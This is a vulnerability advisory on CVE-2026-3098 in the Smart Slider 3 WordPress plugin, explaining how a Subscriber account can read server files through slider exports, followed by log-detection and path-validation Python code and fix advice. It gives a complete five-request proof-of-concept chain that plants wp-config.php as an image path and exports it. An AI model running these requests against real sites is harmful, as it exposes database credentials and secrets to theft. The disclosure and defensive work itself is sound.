CVE-2026-3098 affects Smart Slider 3 and it enables an authenticated low privilege user to turn normal slider and image management flows into an arbitrary local file read. The practical impact is not limited to viewing a file inside the WordPress UI. The vulnerability chain can package the contents of server files into an exported Smart Slider archive, which the attacker can then download and inspect offline. This is dangerous because the exported artifact becomes a clean exfiltration channel for configuration files, credentials, and application secrets that should never leave the server. With an install base around 800k plus, this is a realistic risk for many sites where Subscriber accounts exist through registration, memberships, or WooCommerce, and where plugin permissions are often assumed to be safe by default.

CVE: CVE-2026-3098
Plugin Version: Smart Slider 3 <= 3.5.1.33
All Time: 22 991 514
Active installations: 800 000+
Publicly Published: March 26, 2026
Last Updated: March 26, 2026
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3098
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3/smart-slider-3-35133-authenticated-subscriber-arbitrary-file-read-via-actionexportall
https://t.me/cleantalk_researches/396

Timeline

February 26, 2026: Plugin testing and vulnerability detection in Smart Slider 3 have been completed
February 26, 2026: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
March 26, 2026: Registered CVE-2026-3098

Discovery of the Vulnerability

The core weakness is a chainable set of Smart Slider 3 AJAX actions where at least one mutation path fails to enforce proper capability checks, and where a controller fallback behavior can be abused to reach export functionality without the expected permission and token validation. In the described chain, the attacker first uses benign actions such as listing sliders and creating a visual context for an image so the workflow looks legitimate and produces IDs that can be reused. Next, the image change action allows writing attacker controlled paths into image variant fields, which means values like /etc/passwd or a WordPress config path can be stored where the export logic later expects an image path. Finally, the export all action can be reached by abusing controller routing behavior, and the export routine reads the stored paths using file reads and embeds the content into the generated .ss3 package. The key security failure is that the system treats these internal fields as trusted and does not consistently gate every step with capability checks tied to the action being performed.

Understanding LFI Attacks

Local File Inclusion in WordPress plugin ecosystems is often high severity because of the density of secrets stored on typical hosts. The most valuable target is usually wp-config.php because it can contain database credentials, salts, and integration secrets, and it often enables fast lateral movement into the database and full site compromise. System files like /etc/passwd are less sensitive on their own but still provide usernames and environment hints that accelerate follow on attacks, especially on shared hosting and container deployments where directory layouts and service accounts reveal how the stack is assembled. What makes CVE-2026-3098 more impactful than a basic file read is the export step. Export features are designed to move data across trust boundaries, so once a file can be injected into export input, the plugin itself becomes a courier that sends sensitive content out in a format that defenders may treat as normal admin activity.

Exploiting the LFI Vulnerability

To exploit CVE-2026-3098, an attacker with Subscriber+ cookies sends the following sequence of requests:

POC:

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=foo&nextendaction=index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=list&nextend_nonce=c81a019740&parentID=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=loadvisualforimage&nextend_nonce=c81a019740&image=https://smartslider3.com/wp-content/uploads/slider404/tutorialsliderthumbnail-1.png HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=changevisual&nextend_nonce=c81a019740&visualId=5&value[desktop-retina][image]=&value[tablet][image]=/var/www/html/wordpress/wp-config.php&value[mobile][image]=/var/www/html/wordpress/wp-config.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=foo&nextendaction=exportall&currentGroupID=0&sliders[]=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-login.php?redirect_to=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2F&reauth=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i


The main risk is confidentiality loss that can rapidly translate into full compromise. If an attacker can exfiltrate wp-config.php, they can obtain database credentials and authentication salts, then pivot into the database, extract user hashes, tamper with site content, or plant persistent backdoors through options and plugin settings. In managed hosting environments, reading service configs or environment files can expose API keys for SMTP, payment providers, analytics, and cloud services, creating cross system impact beyond WordPress. The export angle also creates stealth. Administrators and monitoring tools may treat slider exports as ordinary activity, so exfiltration can blend into normal plugin usage, especially if the attacker operates slowly and exports only a few sliders. The combination of low privilege access and high value data makes this a prime example of horizontal privilege becoming server level access through a plugin feature chain.
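Because slider exports can pass for ordinary admin activity, a defender needs the web-server log to surface the specific request shape of this chain. The following Python is an added example, not part of the original write-up: it flags a changevisual call that stores a non-URL image value, and an exportall call that arrives without nextend_nonce or through a controller name the legitimate requests above never use. The log lines and the controller allowlist are constructed from the PoC on this page and are assumptions, not data from any real host.

```python
"""Flag Smart Slider 3 admin-ajax requests matching the CVE-2026-3098 chain (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Controllers the PoC on this page uses legitimately (assumed allowlist, not the plugin's full list).
KNOWN_CONTROLLERS = {"sliders", "image"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def analyze(line: str) -> list:
    """Return findings for one combined-format access-log line ([] if benign)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("action") != ["smart-slider3"]:
        return []
    controller = q.get("nextendcontroller", [""])[0]
    action = q.get("nextendaction", [""])[0]
    findings = []
    # An unknown controller name can reach export through the routing fallback.
    if controller not in KNOWN_CONTROLLERS:
        findings.append(f"unknown controller {controller!r} with action {action!r}")
    # Export must never be reachable without a server-verified nonce.
    if action == "exportall" and "nextend_nonce" not in q:
        findings.append("exportall without nextend_nonce")
    # Image variant fields should carry URLs, never filesystem paths.
    if action == "changevisual":
        for key, values in q.items():
            if key.startswith("value[") and key.endswith("[image]"):
                for v in values:
                    if v and not re.match(r"https?://", v, re.I):
                        findings.append(f"non-URL image value in {key}: {v}")
    return findings

# Constructed log lines reproducing the request sequence shown above.
SAMPLE_LOG = [
    '127.0.0.1 - - [26/Feb/2026:10:00:01 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3'
    '&nextendcontroller=sliders&nextendaction=list&nextend_nonce=c81a019740&parentID=0 HTTP/1.1" 200 512',
    '127.0.0.1 - - [26/Feb/2026:10:00:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3'
    '&nextendcontroller=image&nextendaction=changevisual&nextend_nonce=c81a019740&visualId=5'
    '&value[desktop-retina][image]=&value[tablet][image]=/var/www/html/wordpress/wp-config.php HTTP/1.1" 200 44',
    '127.0.0.1 - - [26/Feb/2026:10:00:03 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=smart-slider3'
    '&nextendcontroller=foo&nextendaction=exportall&currentGroupID=0&sliders[]=1 HTTP/1.1" 200 20480',
]

def scan(lines: list) -> dict:
    """Map line index -> findings for every suspicious line in the log."""
    return {i: f for i, line in enumerate(lines) if (f := analyze(line))}
```

Running `scan(SAMPLE_LOG)` leaves the benign list request alone and reports the changevisual and exportall lines.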

Recommendations for Improved Security

The fix must break the chain at multiple points, because the chain succeeds only when several controls are missing or inconsistent. Every Smart Slider 3 action that mutates state must enforce strict capability checks, and those checks must be aligned with the plugin permission model rather than relying on the presence of a nonce alone. The changevisual path should validate that image paths cannot be absolute filesystem paths and should only accept media library references or validated URLs that are then downloaded into a safe directory. Export routines must never read arbitrary file paths from stored data, and they should treat any file reference as untrusted unless it is an attachment ID that resolves to a file inside uploads. Controller routing must not allow fallback behavior that reaches privileged controllers or actions, and export endpoints should require both a strict capability and a per action nonce that is verified server side. Site owners should reduce exposure by restricting who can access Smart Slider admin features, auditing for unexpected exports, and rotating secrets if there is any suspicion of file disclosure, especially database credentials and authentication salts.
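As an added illustration in Python (not the plugin's PHP fix) of the containment rule recommended above for export routines: a stored image reference is readable only if it is a relative path or a URL under the site's own uploads location and, after realpath normalisation, still lies inside the uploads root. UPLOADS_ROOT and UPLOADS_URL are assumed values.

```python
"""Containment check for stored image references before an export reads them (added example)."""
import os
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

UPLOADS_ROOT = "/var/www/html/wordpress/wp-content/uploads"  # assumed
UPLOADS_URL = "https://example.com/wp-content/uploads"        # assumed
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def resolve_export_path(ref: str) -> Optional[str]:
    """Map a stored image reference to a file the export may read, else None.

    Accepted: a relative path, or a URL below UPLOADS_URL. Rejected: empty
    values, absolute filesystem paths, any other scheme (file://, php://,
    foreign hosts) and traversal that leaves the uploads root after realpath.
    """
    if not ref:
        return None
    if SCHEME_RE.match(ref):
        if not ref.startswith(UPLOADS_URL.rstrip("/") + "/"):
            return None  # foreign host or stream wrapper
        rel = unquote(urlsplit(ref).path)[len(urlsplit(UPLOADS_URL).path):]
    elif ref.startswith(("/", "\\")):
        return None  # absolute filesystem path such as /etc/passwd
    else:
        rel = ref
    root = os.path.realpath(UPLOADS_ROOT)
    candidate = os.path.realpath(os.path.join(root, rel.lstrip("/\\")))
    if os.path.commonpath([candidate, root]) != root:
        return None  # ../ sequences escaped the uploads directory
    return candidate

def export_safe_references(refs):
    """Split stored references into (readable paths, rejected raw values)."""
    ok, rejected = [], []
    for r in refs:
        p = resolve_export_path(r)
        (ok if p else rejected).append(p or r)
    return ok, rejected
```

An export that only reads what `resolve_export_path` returns cannot be steered at wp-config.php or /etc/passwd regardless of what an earlier action stored in the image fields.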

By taking proactive measures to address LFI flaws like CVE-2026-3098, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #LFI #WebsiteSafety #StayProtected #HighVulnerability
